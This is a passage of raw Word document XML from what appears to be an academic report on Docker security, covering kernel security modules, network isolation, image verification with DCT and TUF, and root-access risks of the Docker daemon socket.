      <w:r w:rsidR="0021219E">
        <w:t xml:space="preserve"> to run Docker applications. Therefore, </w:t>
      </w:r>
      <w:r w:rsidR="00B97693">
        <w:t xml:space="preserve">the host OS needs to be secured </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006B2CA2">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00645F3C">
        <w:t xml:space="preserve"> order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B97693">
        <w:t xml:space="preserve"> protect containers from any security breaches.</w:t>
      </w:r>
      <w:r w:rsidR="00C37AC9">
        <w:t xml:space="preserve"> This includes</w:t>
      </w:r>
      <w:r w:rsidR="009A63DB">
        <w:t xml:space="preserve"> enabling </w:t>
      </w:r>
      <w:r w:rsidR="00E12EC2">
        <w:t xml:space="preserve">several </w:t>
      </w:r>
      <w:r w:rsidR="00472839">
        <w:t>key</w:t>
      </w:r>
      <w:r w:rsidR="00571BAE">
        <w:t xml:space="preserve"> Linux kernel</w:t>
      </w:r>
      <w:r w:rsidR="00472839">
        <w:t xml:space="preserve"> security modules</w:t>
      </w:r>
      <w:r w:rsidR="00571BAE">
        <w:t xml:space="preserve">, such as </w:t>
      </w:r>
      <w:r w:rsidR="00537EF9">
        <w:t>SELinux, seccomp, and AppArmor</w:t>
      </w:r>
      <w:r w:rsidR="0027153C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0094329D">
        <w:t xml:space="preserve"> With the latest version of Docker</w:t>
      </w:r>
      <w:r w:rsidR="006572FE">
        <w:t>, all th</w:t>
      </w:r>
      <w:r w:rsidR="000C4D2D">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="006572FE">
        <w:t xml:space="preserve">se security modules are </w:t>
      </w:r>
      <w:r w:rsidR="007A0A2C">
        <w:t xml:space="preserve">available by </w:t>
      </w:r>
      <w:r w:rsidR="00593D7D">
        <w:t>default,</w:t>
      </w:r>
      <w:r w:rsidR="00552A23">
        <w:t xml:space="preserve"> but </w:t>
      </w:r>
      <w:r w:rsidR="00642C99">
        <w:t xml:space="preserve">they </w:t>
      </w:r>
      <w:r w:rsidR="001C44B2">
        <w:t>need to be activated</w:t>
      </w:r>
      <w:r w:rsidR="007A0A2C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B50419">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="0088727B">
        <w:t xml:space="preserve">SELinux </w:t>
      </w:r>
      <w:r w:rsidR="008E70FF">
        <w:t>security architecture</w:t>
      </w:r>
      <w:r w:rsidR="005161A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A82E5C">
        <w:t xml:space="preserve">enforces </w:t>
      </w:r>
      <w:r w:rsidR="00452D79">
        <w:t xml:space="preserve">the files and processes created by </w:t>
      </w:r>
      <w:r w:rsidR="00207AF2">
        <w:t xml:space="preserve">Docker </w:t>
      </w:r>
      <w:r w:rsidR="008C1B6D">
        <w:t xml:space="preserve">to run with restricted access </w:t>
      </w:r>
      <w:r w:rsidR="00CF6243">
        <w:t>within the</w:t>
      </w:r>
      <w:r w:rsidR="008C1B6D">
        <w:t xml:space="preserve"> host system</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-423804685"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="007A51FA">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="007A51FA">
            <w:instrText xml:space="preserve"> CITATION HZh21 \l 2057  \m AEf20</w:instrText>
          </w:r>
          <w:r w:rsidR="007A51FA">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[42, 43]</w:t>
          </w:r>
          <w:r w:rsidR="007A51FA">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="008C1B6D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B629E8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2B0E78" w14:textId="386C6D26" w:rsidR="00DC7E85" w:rsidRDefault="00B629E8" w:rsidP="00CB686E">
      <w:r>
        <w:t>Similarly, AppArmor (Application Armor)</w:t>
      </w:r>
      <w:r w:rsidR="000F7C06">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00131424">
        <w:t>helps to protect the host machine</w:t>
      </w:r>
      <w:r w:rsidR="003D5B82">
        <w:t xml:space="preserve"> OS and </w:t>
      </w:r>
      <w:r w:rsidR="00733F34">
        <w:t>its applications</w:t>
      </w:r>
      <w:r w:rsidR="00131424">
        <w:t xml:space="preserve"> from t</w:t>
      </w:r>
      <w:r w:rsidR="009059A9">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00131424">
        <w:t>reat actors</w:t>
      </w:r>
      <w:r w:rsidR="00733F34">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0015495D">
        <w:t xml:space="preserve"> It </w:t>
      </w:r>
      <w:r w:rsidR="001F43C8">
        <w:t xml:space="preserve">allows users to define policies </w:t>
      </w:r>
      <w:r w:rsidR="00CE1DC5">
        <w:t xml:space="preserve">to a specific </w:t>
      </w:r>
      <w:r w:rsidR="008B2231">
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidR="00CE1DC5">
        <w:t>path</w:t>
      </w:r>
      <w:r w:rsidR="00C00362">
        <w:t xml:space="preserve"> and t</w:t>
      </w:r>
      <w:r w:rsidR="00A57986">
        <w:t>he permissions they have.</w:t>
      </w:r>
      <w:r w:rsidR="00DF2151">
        <w:t xml:space="preserve"> Therefore, t</w:t>
      </w:r>
      <w:r w:rsidR="003E09D6">
        <w:t xml:space="preserve">he AppArmor </w:t>
      </w:r>
      <w:r w:rsidR="00E0549E">
        <w:t xml:space="preserve">security </w:t>
      </w:r>
      <w:r w:rsidR="003E09D6">
        <w:t xml:space="preserve">policies </w:t>
      </w:r>
      <w:r w:rsidR="005A0188">
        <w:t xml:space="preserve">can be linked to </w:t>
      </w:r>
      <w:r w:rsidR="002C378F">
        <w:t>each application</w:t>
      </w:r>
      <w:r w:rsidR="00925B73">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00DB7A6E">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00925B73">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB7A6E">
        <w:t>suitable</w:t>
      </w:r>
      <w:r w:rsidR="00556536">
        <w:t xml:space="preserve"> for restricting application </w:t>
      </w:r>
      <w:r w:rsidR="00C307E6">
        <w:t>access.</w:t>
      </w:r>
      <w:r w:rsidR="001011E6">
        <w:t xml:space="preserve"> By default, Docker applies the </w:t>
      </w:r>
      <w:r w:rsidR="00932463">
        <w:t xml:space="preserve">docker-default AppArmor security profile for </w:t>
      </w:r>
      <w:r w:rsidR="00AE275E">
        <w:t xml:space="preserve">running </w:t>
      </w:r>
      <w:r w:rsidR="00932463">
        <w:t>containers</w:t>
      </w:r>
      <w:r w:rsidR="00F06E18">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="006E5459">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C0386E">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="006E5459">
        <w:t xml:space="preserve">owever, </w:t>
      </w:r>
      <w:r w:rsidR="00E12933">
        <w:t xml:space="preserve">users have permission to tweak or adjust </w:t>
      </w:r>
      <w:r w:rsidR="00D7210E">
        <w:t xml:space="preserve">the docker-default </w:t>
      </w:r>
      <w:r w:rsidR="004223DE">
        <w:t>to their needs.</w:t>
      </w:r>
      <w:r w:rsidR="006E5459">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC7E85">
        <w:t>In addition, th</w:t>
      </w:r>
      <w:r w:rsidR="00FB4507">
        <w:t xml:space="preserve">e seccomp </w:t>
      </w:r>
      <w:r w:rsidR="00037FE8">
        <w:t>is another Linux kernel f</w:t>
      </w:r>
      <w:r w:rsidR="00226161">
        <w:t xml:space="preserve">eature that </w:t>
      </w:r>
      <w:r w:rsidR="001C5C59">
        <w:t>helps</w:t>
      </w:r>
      <w:r w:rsidR="00E2200D">
        <w:t xml:space="preserve"> Docker run</w:t>
      </w:r>
      <w:r w:rsidR="00FB43EF">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00C34D81">
        <w:t>a secure environment</w:t>
      </w:r>
      <w:r w:rsidR="00970509">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0050359F">
        <w:t xml:space="preserve"> It enables users to </w:t>
      </w:r>
      <w:r w:rsidR="001B1EED">
        <w:t xml:space="preserve">restrict </w:t>
      </w:r>
      <w:r w:rsidR="00F25D9A">
        <w:t xml:space="preserve">and filter </w:t>
      </w:r>
      <w:r w:rsidR="00417349">
        <w:t xml:space="preserve">system calls </w:t>
      </w:r>
      <w:r w:rsidR="00735488">
        <w:t>between the Docker con</w:t>
      </w:r>
      <w:r w:rsidR="006442C3">
        <w:t xml:space="preserve">tainers </w:t>
      </w:r>
      <w:r w:rsidR="00DE3A6B">
        <w:t xml:space="preserve">and the </w:t>
      </w:r>
      <w:r w:rsidR="005619BF">
        <w:t>host’s Linux kernel.</w:t>
      </w:r>
      <w:r w:rsidR="00FF464B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1492601850"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00FF464B">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00FF464B">
            <w:instrText xml:space="preserve"> CITATION HZh21 \l 2057  \m AEf20</w:instrText>
          </w:r>
          <w:r w:rsidR="004C7BDA">
            <w:instrText xml:space="preserve"> \m SGa16</w:instrText>
          </w:r>
          <w:r w:rsidR="00FF464B">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[42, 43, 44]</w:t>
          </w:r>
          <w:r w:rsidR="00FF464B">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="004C7BDA">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C44F19">
        <w:t xml:space="preserve"> Therefore,</w:t>
      </w:r>
      <w:r w:rsidR="004C7BDA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00141136">
        <w:t xml:space="preserve">the host security can be improved </w:t>
      </w:r>
      <w:r w:rsidR="00770A87">
        <w:t xml:space="preserve">by implementing additional </w:t>
      </w:r>
      <w:r w:rsidR="00D81219">
        <w:t xml:space="preserve">Linux kernel </w:t>
      </w:r>
      <w:r w:rsidR="00E035FF">
        <w:t>solutions, including SELinux, AppAr</w:t>
      </w:r>
      <w:r w:rsidR="009A2BFB">
        <w:t>mor, and seccomp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7346F745" w14:textId="0622DABF" w:rsidR="009A2BFB" w:rsidRDefault="009A2BFB" w:rsidP="00745D17">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc87032898"/>
      <w:r>
        <w:t xml:space="preserve">Network </w:t>
      </w:r>
      <w:r w:rsidR="00D41BA1">
        <w:t>Isolation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="3009237F" w14:textId="160C7428" w:rsidR="00980894" w:rsidRDefault="00FC4338" w:rsidP="00745D17">
      <w:r>
        <w:t xml:space="preserve">Containers are designed to </w:t>
      </w:r>
      <w:r w:rsidR="00265F90">
        <w:t xml:space="preserve">work </w:t>
      </w:r>
      <w:r w:rsidR="00BC0F2B">
        <w:t>within their own isolated environment</w:t>
      </w:r>
      <w:r w:rsidR="006A230C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="002743F9">
        <w:t>implying</w:t>
      </w:r>
      <w:r w:rsidR="00D3578F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0098039E">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="00D3578F">
        <w:t xml:space="preserve">they cannot interact unless </w:t>
      </w:r>
      <w:r w:rsidR="005A36E8">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00460ED2">
        <w:t xml:space="preserve">network channel is </w:t>
      </w:r>
      <w:r w:rsidR="00A90FA7">
        <w:t>established</w:t>
      </w:r>
      <w:r w:rsidR="00460ED2">
        <w:t xml:space="preserve"> between them.</w:t>
      </w:r>
      <w:r w:rsidR="002F65A9">
        <w:t xml:space="preserve"> Docker </w:t>
      </w:r>
      <w:r w:rsidR="00562446">
        <w:t xml:space="preserve">uses </w:t>
      </w:r>
      <w:r w:rsidR="005368DA">
        <w:t xml:space="preserve">API </w:t>
      </w:r>
      <w:r w:rsidR="00FD312A">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="0081786C">
        <w:t xml:space="preserve">establish communication </w:t>
      </w:r>
      <w:r w:rsidR="006036F3">
        <w:t xml:space="preserve">between containers and supports various </w:t>
      </w:r>
      <w:r w:rsidR="00AA671C">
        <w:t xml:space="preserve">network types, such as </w:t>
      </w:r>
      <w:r w:rsidR="00EB6F57">
        <w:t xml:space="preserve">bridge, overlay, </w:t>
      </w:r>
      <w:r w:rsidR="00AE44EE">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00F36041">
        <w:t>Macvlan</w:t>
      </w:r>
      <w:r w:rsidR="00AE44EE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DB4701">
        <w:t xml:space="preserve"> Those </w:t>
      </w:r>
      <w:r w:rsidR="000C2BC3">
        <w:t xml:space="preserve">networks help Docker to </w:t>
      </w:r>
      <w:r w:rsidR="00404E0A">
        <w:t xml:space="preserve">share images </w:t>
      </w:r>
      <w:r w:rsidR="00157EB5">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="00087F7F">
        <w:t>to control the Docker</w:t>
      </w:r>
      <w:r w:rsidR="0059609A">
        <w:t xml:space="preserve"> daemon remotely through the API.</w:t>
      </w:r>
      <w:r w:rsidR="000554A4">
        <w:t xml:space="preserve"> By default, Docker </w:t>
      </w:r>
      <w:r w:rsidR="009C589F">
        <w:t xml:space="preserve">creates </w:t>
      </w:r>
      <w:r w:rsidR="00AE7EC3">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="009C589F">
        <w:t xml:space="preserve">bridge network by </w:t>
      </w:r>
      <w:r w:rsidR="003C32A0">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">giving </w:t>
      </w:r>
      <w:r w:rsidR="00F530B4">
        <w:t>IP address</w:t>
      </w:r>
      <w:r w:rsidR="00025083">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="00F530B4">
        <w:t xml:space="preserve"> and default gateway to containers.</w:t>
      </w:r>
      <w:r w:rsidR="002816AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00554B0E">
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="002816AB">
        <w:t xml:space="preserve">owever, the </w:t>
      </w:r>
      <w:r w:rsidR="005500F9">
        <w:t xml:space="preserve">bridge network </w:t>
      </w:r>
      <w:r w:rsidR="00574E99">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="004F654F">
        <w:t>susceptible</w:t>
      </w:r>
      <w:r w:rsidR="00574E99">
        <w:t xml:space="preserve"> to ARP or MAC flooding attacks because</w:t>
      </w:r>
      <w:r w:rsidR="00F05086">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0098507B">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="0012787D">
        <w:t xml:space="preserve">does not </w:t>
      </w:r>
      <w:r w:rsidR="00322A11">
        <w:t>support filtering or checking incoming and outgoing packets.</w:t>
      </w:r>
      <w:r w:rsidR="003A5B49">
        <w:t xml:space="preserve"> Alternatively, </w:t>
      </w:r>
      <w:r w:rsidR="00F367F3">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="003A5B49">
        <w:t xml:space="preserve">container </w:t>
      </w:r>
      <w:r w:rsidR="008C772D">
        <w:t xml:space="preserve">can share </w:t>
      </w:r>
      <w:r w:rsidR="001258A5">
        <w:t xml:space="preserve">IP address from the host </w:t>
      </w:r>
      <w:r w:rsidR="00542ED1">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="003A7EFD">
        <w:t xml:space="preserve">connect to the </w:t>
      </w:r>
      <w:r w:rsidR="004D2E61">
        <w:t>public or internet networks.</w:t>
      </w:r>
      <w:r w:rsidR="00697B07">
        <w:t xml:space="preserve"> However, this met</w:t>
      </w:r>
      <w:r w:rsidR="005B5941">
        <w:t xml:space="preserve">hod is more vulnerable to security breaches </w:t>
      </w:r>
      <w:r w:rsidR="00BD17BE">
        <w:t xml:space="preserve">as it exposes </w:t>
      </w:r>
      <w:r w:rsidR="00867AA4">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00BD17BE">
        <w:t xml:space="preserve">container </w:t>
      </w:r>
      <w:r w:rsidR="00E839AD">
        <w:t>to public networks directly</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1976871148"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00F72A0C">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00F72A0C">
            <w:instrText xml:space="preserve"> CITATION doc161 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="008D29A0">
            <w:instrText xml:space="preserve"> \m TCo16</w:instrText>
          </w:r>
          <w:r w:rsidR="00F72A0C">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[45, 46]</w:t>
          </w:r>
          <w:r w:rsidR="00F72A0C">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00E839AD">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003A5B49">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B4319D" w14:textId="1A2D76E2" w:rsidR="00745D17" w:rsidRDefault="00B307C8" w:rsidP="00745D17">
      <w:r>
        <w:t xml:space="preserve">Images </w:t>
      </w:r>
      <w:r w:rsidR="006F11A1">
        <w:t xml:space="preserve">are stored and distributed from </w:t>
      </w:r>
      <w:r w:rsidR="00AB481D">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00267DF7">
        <w:t xml:space="preserve">public </w:t>
      </w:r>
      <w:r w:rsidR="00A93C1B">
        <w:t>Docker hub repository</w:t>
      </w:r>
      <w:r w:rsidR="00C92D9A">
        <w:t xml:space="preserve"> over a </w:t>
      </w:r>
      <w:r w:rsidR="006366C6">
        <w:t xml:space="preserve">secure </w:t>
      </w:r>
      <w:r w:rsidR="00C92D9A">
        <w:t xml:space="preserve">TLS </w:t>
      </w:r>
      <w:r w:rsidR="00385CE2">
        <w:t>connection.</w:t>
      </w:r>
      <w:r w:rsidR="00CB3D99">
        <w:t xml:space="preserve"> In addition, Docker allows users to verify </w:t>
      </w:r>
      <w:r w:rsidR="00CA11BE">
        <w:t xml:space="preserve">images </w:t>
      </w:r>
      <w:r w:rsidR="00391C1D">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r w:rsidR="005D4187">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00391C1D">
        <w:t>hash technique</w:t>
      </w:r>
      <w:r w:rsidR="006B06EF">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00C4151B">
        <w:t xml:space="preserve">check </w:t>
      </w:r>
      <w:r w:rsidR="005D4187">
        <w:t>their</w:t>
      </w:r>
      <w:r w:rsidR="00AB504C">
        <w:t xml:space="preserve"> integrity and o</w:t>
      </w:r>
      <w:r w:rsidR="00441A1D">
        <w:t>riginality</w:t>
      </w:r>
      <w:r w:rsidR="00ED5687">
        <w:t xml:space="preserve"> using Docker content trust (DCT)</w:t>
      </w:r>
      <w:r w:rsidR="00441A1D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F23D65">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C5149">
        <w:t>Docker</w:t>
      </w:r>
      <w:r w:rsidR="00F23D65">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FD5DC1">
        <w:t>also utilises</w:t>
      </w:r>
      <w:r w:rsidR="00787A37">
        <w:t xml:space="preserve"> the update </w:t>
      </w:r>
      <w:r w:rsidR="006F7F22">
        <w:t>framework (TUF)</w:t>
      </w:r>
      <w:r w:rsidR="004820C8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E23DD2">
        <w:t>to verify t</w:t>
      </w:r>
      <w:r w:rsidR="0083212F">
        <w:t xml:space="preserve">he publisher content </w:t>
      </w:r>
      <w:r w:rsidR="002044EE">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="006030EE">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00A42C84">
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidR="00057682">
        <w:t>integrity</w:t>
      </w:r>
      <w:r w:rsidR="00A42C84">
        <w:t xml:space="preserve"> of Docker images</w:t>
      </w:r>
      <w:r w:rsidR="00057682">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002B6785">
        <w:t xml:space="preserve"> The </w:t>
      </w:r>
      <w:r w:rsidR="003061F8">
        <w:t>TUF</w:t>
      </w:r>
      <w:r w:rsidR="006116CA">
        <w:t xml:space="preserve"> provides </w:t>
      </w:r>
      <w:r w:rsidR="00437A51">
        <w:t>secure software update system</w:t>
      </w:r>
      <w:r w:rsidR="00E965FC">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="007E4006">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E67EBE">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:r w:rsidR="00E708E6">
        <w:t xml:space="preserve"> various attacks</w:t>
      </w:r>
      <w:r w:rsidR="00437A51">
        <w:t>, such as replay attacks</w:t>
      </w:r>
      <w:r w:rsidR="00D83A92">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A259E3">
        <w:t xml:space="preserve"> Further, </w:t>
      </w:r>
      <w:r w:rsidR="00096329">
        <w:t xml:space="preserve">the Docker daemon </w:t>
      </w:r>
      <w:r w:rsidR="00E276BB">
        <w:t xml:space="preserve">is an essential component that </w:t>
      </w:r>
      <w:r w:rsidR="003A43D2">
        <w:t xml:space="preserve">allows users to interact </w:t>
      </w:r>
      <w:r w:rsidR="005F14FC">
        <w:t xml:space="preserve">and conduct Docker commands </w:t>
      </w:r>
      <w:r w:rsidR="006003A1">
        <w:t>via the API from another host</w:t>
      </w:r>
      <w:r w:rsidR="003D0425">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D15978">
        <w:t xml:space="preserve"> It is managed remotely</w:t>
      </w:r>
      <w:r w:rsidR="001C17AF">
        <w:t xml:space="preserve"> using the UNIX socket located at </w:t>
      </w:r>
      <w:r w:rsidR="00087F48">
        <w:t>/var/run/docker.sock</w:t>
      </w:r>
      <w:r w:rsidR="0019129F">
        <w:t xml:space="preserve">, and it </w:t>
      </w:r>
      <w:r w:rsidR="00360733">
        <w:t xml:space="preserve">gives </w:t>
      </w:r>
      <w:r w:rsidR="0019129F">
        <w:t>root access</w:t>
      </w:r>
      <w:r w:rsidR="00360733">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00A33389">
        <w:t>any Docker user</w:t>
      </w:r>
      <w:r w:rsidR="0090477F">
        <w:t xml:space="preserve"> by default</w:t>
      </w:r>
      <w:r w:rsidR="00D270FE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004B3555">
        <w:t xml:space="preserve"> This </w:t>
      </w:r>
      <w:r w:rsidR="00A77FE1">
        <w:t>means that any user can run a container with root privilege</w:t>
      </w:r>
      <w:r w:rsidR="006E20B5">
        <w:t>, enabling</w:t>
      </w:r>
      <w:r w:rsidR="003B35A2">
        <w:t xml:space="preserve"> root access</w:t>
      </w:r>
      <w:r w:rsidR="006A309E">
        <w:t xml:space="preserve"> to the host</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1603299947"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="009A2540">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="009A2540">
            <w:instrText xml:space="preserve"> CITATION doc16 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="002F5A15">
            <w:instrText xml:space="preserve"> \m git21</w:instrText>
          </w:r>
          <w:r w:rsidR="004673E0">
            <w:instrText xml:space="preserve"> \m TCo16</w:instrText>
          </w:r>
          <w:r w:rsidR="009A2540">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[47, 48, 46]</w:t>
          </w:r>
          <w:r w:rsidR="009A2540">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="006A309E">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001E3106">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DDA665" w14:textId="44C204FF" w:rsidR="00526B06" w:rsidRDefault="0099358C" w:rsidP="00900794">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc87032899"/>
      <w:r>
        <w:t>DOCKER SECURITY THREATS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="45B80DC6" w14:textId="22CD62C0" w:rsidR="00F373C6" w:rsidRDefault="00337ABC" w:rsidP="00CB686E">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00983B01">
        <w:t>Docker</w:t>
      </w:r>
      <w:r w:rsidR="00DC5A69">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A02042">
        <w:t xml:space="preserve">platform </w:t>
      </w:r>
      <w:r w:rsidR="007A0F89">
        <w:t xml:space="preserve">has become the de facto </w:t>
      </w:r>
      <w:r w:rsidR="00591D2F">
        <w:t xml:space="preserve">for deploying containerised applications </w:t>
      </w:r>
      <w:r w:rsidR="00004416">
        <w:t>within the cloud</w:t>
      </w:r>
      <w:r w:rsidR="006C4ED3">
        <w:t xml:space="preserve"> in recent years</w:t>
      </w:r>
      <w:r w:rsidR="00B510CC">
        <w:t xml:space="preserve"> because of its </w:t>
      </w:r>
      <w:r w:rsidR="006471C8">
        <w:t>flexibility, efficiency, and scalability.</w:t>
      </w:r>
      <w:r w:rsidR="00FF0DC6">
        <w:t xml:space="preserve"> However, </w:t>
      </w:r>
      <w:r w:rsidR="00965459">
        <w:t xml:space="preserve">its security </w:t>
      </w:r>
      <w:r w:rsidR="00D4172D">
        <w:t xml:space="preserve">strategy is </w:t>
      </w:r>
      <w:r w:rsidR="006E4AD6">
        <w:t>in its early stage to be adopted by many enterprises.</w:t>
      </w:r>
      <w:r w:rsidR="00124DBD">
        <w:t xml:space="preserve"> For example, Docker shares the host kernel</w:t>
      </w:r>
      <w:r w:rsidR="00E82946">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005160F6">
        <w:t>expos</w:t>
      </w:r>
      <w:r w:rsidR="00837120">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="005160F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0060424B">
        <w:t xml:space="preserve">a container to </w:t>
      </w:r>
      <w:r w:rsidR="00583333">
        <w:t xml:space="preserve">several security </w:t>
      </w:r>
      <w:r w:rsidR="00940F52">
        <w:t xml:space="preserve">threats </w:t>
      </w:r>
